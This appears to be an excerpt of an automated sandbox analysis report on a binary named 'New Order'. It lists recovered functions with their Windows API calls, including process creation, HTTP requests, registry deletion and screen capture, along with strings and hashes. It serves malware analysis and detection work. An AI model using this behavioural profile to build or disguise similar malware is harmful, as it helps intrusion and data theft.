GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034B1D4
_wcslen.LIBCMT ref: 0034B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034B236
_wcslen.LIBCMT ref: 0034B332

Part of subcall function 003305A7: GetStdHandle.KERNEL32(000000F6), ref: 003305C6

_wcslen.LIBCMT ref: 0034B34B
_wcslen.LIBCMT ref: 0034B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0034B3B6
GetLastError.KERNEL32(00000000), ref: 0034B407
CloseHandle.KERNEL32(?), ref: 0034B439
CloseHandle.KERNEL32(00000000), ref: 0034B44A
CloseHandle.KERNEL32(00000000), ref: 0034B45C
CloseHandle.KERNEL32(00000000), ref: 0034B46E
CloseHandle.KERNEL32(?), ref: 0034B4E3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 956f26afee09f29a81d5695770a731b51a213079150a952f9ed19b2e02356a6e
Instruction ID: 3bf56221d122a42bf50fdfe859786ac7b0078ecc8dd423bc9acd7820fb56c167
Opcode Fuzzy Hash: 956f26afee09f29a81d5695770a731b51a213079150a952f9ed19b2e02356a6e
Instruction Fuzzy Hash: 4AF188316183409FC726EF25C891B2ABBE5AF85314F15895DF8999F2A2CB31EC44CF52

Function 002C326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00391990), ref: 00302F8D
GetMenuItemCount.USER32(00391990), ref: 0030303D
GetCursorPos.USER32(?), ref: 00303081
SetForegroundWindow.USER32(00000000), ref: 0030308A
TrackPopupMenuEx.USER32(00391990,00000000,?,00000000,00000000,00000000), ref: 0030309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003030A9

Strings

0, xrefs: 002C327D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: dca43cb4ffcb00882ad0dff06d581a69e4b73b1e0aae355b16940ee271653498
Instruction ID: 7ef5af11902f4150b02b12ba81a707fba559900687e01b6fb68950ed4cbb3715
Opcode Fuzzy Hash: dca43cb4ffcb00882ad0dff06d581a69e4b73b1e0aae355b16940ee271653498
Instruction Fuzzy Hash: 70712970645316BEEB228F65DC59F9BBF68FF01368F204206F9156A1E0C7B1AD10CB51

Function 00356CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00356DEB

Part of subcall function 002C6B57: _wcslen.LIBCMT ref: 002C6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00356E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00356E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00356E94
DestroyWindow.USER32(?), ref: 00356EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002C0000,00000000), ref: 00356EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00356EFD
GetDesktopWindow.USER32 ref: 00356F16
GetWindowRect.USER32(00000000), ref: 00356F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00356F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00356F4D

Part of subcall function 002D9944: GetWindowLongW.USER32(?,000000EB), ref: 002D9952

Strings

0, xrefs: 00356D98
tooltips_class32, xrefs: 00356E58, 00356EDD

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: a405cd2281e1154292a0c99b099abb303263b2f2f8ed3fc9146226826ebca61a
Instruction ID: d58f29e5c31d68268b1d0069c6aa5900c2f2c07334fa5d37fcc572f5d11c3e45
Opcode Fuzzy Hash: a405cd2281e1154292a0c99b099abb303263b2f2f8ed3fc9146226826ebca61a
Instruction Fuzzy Hash: 42717670504341AFDB22CF18DC59FAABBE9FB99305F84091EF98997271C771A90ACB11

Function 0033C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0033C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0033C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0033C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0033C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0033C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0033C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0033C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0033C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0033C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0033C5F0
InternetCloseHandle.WININET(00000000), ref: 0033C5FB

Strings

, xrefs: 0033C575

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 4cfa3a66da807e9a7ba7e6e8cbc0ff0fe372663b2d40efbfb66d4b894329958a
Instruction ID: 1daffdce18dc95c8dd4573cb2c23a4e14456b85d63430c6d9af87c9d112bd1f8
Opcode Fuzzy Hash: 4cfa3a66da807e9a7ba7e6e8cbc0ff0fe372663b2d40efbfb66d4b894329958a
Instruction Fuzzy Hash: 08516BB1510308BFEB229F62CD88AAB7BBCFF09745F006419F945A6620DB35E944DB60

Function 0035856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00358592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003585F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0035FC38,?), ref: 00358611
GlobalFree.KERNEL32(00000000), ref: 00358621
GetObjectW.GDI32(?,00000018,?), ref: 00358641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00358671
DeleteObject.GDI32(?), ref: 00358699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003586AF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 64477f28c77c78f00d8de163481621427ec9adda1a4cfc9af36663062976a87e
Instruction ID: 4bc038440435665d9c0cb5a7f23334f3da59dffef3571749330a0ab17d1d4cb0
Opcode Fuzzy Hash: 64477f28c77c78f00d8de163481621427ec9adda1a4cfc9af36663062976a87e
Instruction Fuzzy Hash: 76410975610308AFDB129FA5CC48EAA7BBCEF89716F154458F906E7260DB309E45CB60

Function 003314BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00331502
VariantCopy.OLEAUT32(?,?), ref: 0033150B
VariantClear.OLEAUT32(?), ref: 00331517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003315FB
VarR8FromDec.OLEAUT32(?,?), ref: 00331657
VariantInit.OLEAUT32(?), ref: 00331708
SysFreeString.OLEAUT32(?), ref: 0033178C
VariantClear.OLEAUT32(?), ref: 003317D8
VariantClear.OLEAUT32(?), ref: 003317E7
VariantInit.OLEAUT32(00000000), ref: 00331823

Strings

Default, xrefs: 003316AF
%4d%02d%02d%02d%02d%02d, xrefs: 00331625

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: f953e291525a54254c70a02eb933c5356553e12b296d4855f89307d6561637db
Instruction ID: 43ec294459ddc23cbb4a3fc21bda2c7f1bb9334d19fb95367632f1f77f19c0aa
Opcode Fuzzy Hash: f953e291525a54254c70a02eb933c5356553e12b296d4855f89307d6561637db
Instruction Fuzzy Hash: 32D13272A00205EFEB129F65D8C5B7DB7B9BF46700F14845AF806AB690DB30EC51DBA1

Function 0034B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Part of subcall function 0034C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0034B6AE,?,?), ref: 0034C9B5
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034C9F1
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034CA68
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0034B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0034B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0034B80A
RegCloseKey.ADVAPI32(?), ref: 0034B87E
RegCloseKey.ADVAPI32(?), ref: 0034B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0034B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0034B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0034B922
FreeLibrary.KERNEL32(00000000), ref: 0034B983
RegCloseKey.ADVAPI32(00000000), ref: 0034B994

Strings

advapi32.dll, xrefs: 0034B8ED
RegDeleteKeyExW, xrefs: 0034B8FE

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 57d6badb9845b96f53809c41b6ad623327225677f947ac671d41a5b772d24adf
Instruction ID: c274744bfd72e082a72cf603c3447831ccacafb091bfac4dc4785bf321328c59
Opcode Fuzzy Hash: 57d6badb9845b96f53809c41b6ad623327225677f947ac671d41a5b772d24adf
Instruction Fuzzy Hash: B4C16830218241AFD715DF24C895F2ABBE5AF84318F15859CE49A8F6A2CB31E946CF91

Function 0034255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 003425D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003425E8
CreateCompatibleDC.GDI32(?), ref: 003425F4
SelectObject.GDI32(00000000,?), ref: 00342601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0034266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003426AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003426D0
SelectObject.GDI32(?,?), ref: 003426D8
DeleteObject.GDI32(?), ref: 003426E1
DeleteDC.GDI32(?), ref: 003426E8
ReleaseDC.USER32(00000000,?), ref: 003426F3

Strings

(, xrefs: 0034268D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b0d571ba77ccded91fb829c4c91dc8748aa2453ee0d2bbb023145d4cf60f110f
Instruction ID: ccf87fe6dcc3dcdb3851b201bcf2a83909b2ff2f7aceec2b96d577602ea685d4
Opcode Fuzzy Hash: b0d571ba77ccded91fb829c4c91dc8748aa2453ee0d2bbb023145d4cf60f110f
Instruction Fuzzy Hash: F961E275D00219EFCF05CFA4D884AAEBBF9FF48310F208529E955AB260D774AA51CF54

Function 002FDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 002FDAA1

Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD659
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD66B
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD67D
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD68F
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD6A1
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD6B3
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD6C5
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD6D7
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD6E9
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD6FB
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD70D
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD71F
Part of subcall function 002FD63C: _free.LIBCMT ref: 002FD731

_free.LIBCMT ref: 002FDA96

Part of subcall function 002F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000), ref: 002F29DE
Part of subcall function 002F29C8: GetLastError.KERNEL32(00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000,00000000), ref: 002F29F0

_free.LIBCMT ref: 002FDAB8
_free.LIBCMT ref: 002FDACD
_free.LIBCMT ref: 002FDAD8
_free.LIBCMT ref: 002FDAFA
_free.LIBCMT ref: 002FDB0D
_free.LIBCMT ref: 002FDB1B
_free.LIBCMT ref: 002FDB26
_free.LIBCMT ref: 002FDB5E
_free.LIBCMT ref: 002FDB65
_free.LIBCMT ref: 002FDB82
_free.LIBCMT ref: 002FDB9A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 901cc37c50e7470e4c7bc70d826e02557377f005a5c6b8d70453bd324ecf7c85
Instruction ID: c2c5ad550a52f97feb1fbd7db8085c734911e7526159772593b0089b80ec86b6
Opcode Fuzzy Hash: 901cc37c50e7470e4c7bc70d826e02557377f005a5c6b8d70453bd324ecf7c85
Instruction Fuzzy Hash: D7316E3156430ADFDB21AE34E845B7AF7EAFF01390F205539E249D7191DE71AC648B24

Function 0032365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0032369C
_wcslen.LIBCMT ref: 003236A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00323797
GetClassNameW.USER32(?,?,00000400), ref: 0032380C
GetDlgCtrlID.USER32(?), ref: 0032385D
GetWindowRect.USER32(?,?), ref: 00323882
GetParent.USER32(?), ref: 003238A0
ScreenToClient.USER32(00000000), ref: 003238A7
GetClassNameW.USER32(?,?,00000100), ref: 00323921
GetWindowTextW.USER32(?,?,00000400), ref: 0032395D

Strings

%s%u, xrefs: 00323734

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: e44f2c99e99681822c0f79bd915de319655e6a24454d56a0cdb54fb02fceecc7
Instruction ID: 68263faaacc93959bf3e9336976c6ae79958fe045dc37d058c607fc709b80189
Opcode Fuzzy Hash: e44f2c99e99681822c0f79bd915de319655e6a24454d56a0cdb54fb02fceecc7
Instruction Fuzzy Hash: 8391E171200326AFD71ADF24D884FAAF7E8FF44304F008629F999D6190DB34EA59CB91

Function 00324954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00324994
GetWindowTextW.USER32(?,?,00000400), ref: 003249DA
_wcslen.LIBCMT ref: 003249EB
CharUpperBuffW.USER32(?,00000000), ref: 003249F7
_wcsstr.LIBVCRUNTIME ref: 00324A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00324A64
GetWindowTextW.USER32(?,?,00000400), ref: 00324A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00324AE6
GetClassNameW.USER32(?,?,00000400), ref: 00324B20
GetWindowRect.USER32(?,?), ref: 00324B8B

Strings

ThumbnailClass, xrefs: 00324A6F, 00324AF1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: bf918492fbca1a273a2c2e0054004cb13dda79c7b4e6d938110301c987a36d72
Instruction ID: e08cbed5b0d3d13ff62cc2b4a1af5801c5a7771dc4dbec71caff00dd1e3c3069
Opcode Fuzzy Hash: bf918492fbca1a273a2c2e0054004cb13dda79c7b4e6d938110301c987a36d72
Instruction Fuzzy Hash: 6591F2311083259FDB06DF14E985FAA77E8FF84314F04846AFD859A196EB30EE45CBA1

Function 00358D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 002D9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00358D5A
GetFocus.USER32 ref: 00358D6A
GetDlgCtrlID.USER32(00000000), ref: 00358D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00358E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00358ECF
GetMenuItemCount.USER32(?), ref: 00358EEC
GetMenuItemID.USER32(?,00000000), ref: 00358EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00358F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00358F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00358FA1

Strings

0, xrefs: 00358E9F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 695ca5079393fb02afa30f6ced9034ad15c2cc40e842b0bf468983d57091e0f6
Instruction ID: 17b0712bece90c18f533cdb42904fe46738e287599d4bb609892abfc8a5d8586
Opcode Fuzzy Hash: 695ca5079393fb02afa30f6ced9034ad15c2cc40e842b0bf468983d57091e0f6
Instruction Fuzzy Hash: 40819C715083019FDB12CF24D885EABBBF9FB88355F05091AFD85A72A1DB30D908CBA1

Function 0032DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0032DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0032DC46
_wcslen.LIBCMT ref: 0032DC50
_wcsstr.LIBVCRUNTIME ref: 0032DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0032DCBC

Strings

DefaultLangCodepage, xrefs: 0032DD1F
StringFileInfo\, xrefs: 0032DC8F
%u.%u.%u.%u, xrefs: 0032DD9A
04090000, xrefs: 0032DCF2
\VarFileInfo\Translation, xrefs: 0032DCB4

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
